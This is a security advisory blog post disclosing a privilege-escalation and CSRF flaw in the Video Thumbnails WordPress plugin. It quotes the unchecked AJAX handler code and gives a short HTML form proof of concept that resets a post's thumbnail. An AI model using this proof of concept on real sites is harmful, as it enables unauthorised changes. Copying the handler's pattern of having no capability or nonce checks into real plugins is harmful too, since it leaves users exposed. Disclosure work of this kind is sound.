Login
4 Nov 2022

Privilege Escalation Vulnerability in Video Thumbnails WordPress Plugin

Earlier this week the WordPress plugin Video Thumbnails was closed on the WordPress Plugin Directory. As that plugin is one of the 1,000 most popular plugins, we were alerted to its closure. No reason has been given for the closure. But there are multiple minor security vulnerabilities in the latest version.

As one example of those vulnerabilities, the functionality for “resetting a video thumbnail” is accessible to anyone logged in to WordPress, instead of only to someone is who is editing the relevant post related to a video thumbnail.

The plugin registers the function that handles that, ajax_reset_callback(), to be accessible through WordPress’ AJAX functionality:

77

add_action( 'wp_ajax_reset_video_thumbnail', array( &$this, 'ajax_reset_callback' ) );

That function, which is located in the file /video-thumbnails.php, doesn’t have any security checks in place:

462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480

function ajax_reset_callback() {
	global $wpdb; // this is how you get access to the database
 
	$post_id = $_POST['post_id'];
 
	delete_post_meta( $post_id, VIDEO_THUMBNAILS_FIELD );
 
	$video_thumbnail = get_video_thumbnail( $post_id );
 
	if ( is_wp_error( $video_thumbnail ) ) {
		echo $video_thumbnail->get_error_message();
	} else if ( $video_thumbnail != null ) {
		echo '<img src="' . $video_thumbnail . '" style="max-width:100%;" />';
	} else {
		echo __( 'No video thumbnail for this post.', 'video-thumbnails' );
	}
 
	die();
}

So anyone logged in to WordPress can access that functionality, which is privilege escalation, and an attacker could cause someone who is logged in to access that without intending it, which is cross-site request forgery (CSRF).

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof concept will reset the video thumbnail for the post with ID 1, when logged in to WordPress as a Subscriber.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=reset_video_thumbnail" method="POST">
<input type="hidden" name="post_id" value="1" />
<input type="submit" value="Submit" />
</form>
</body>

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published.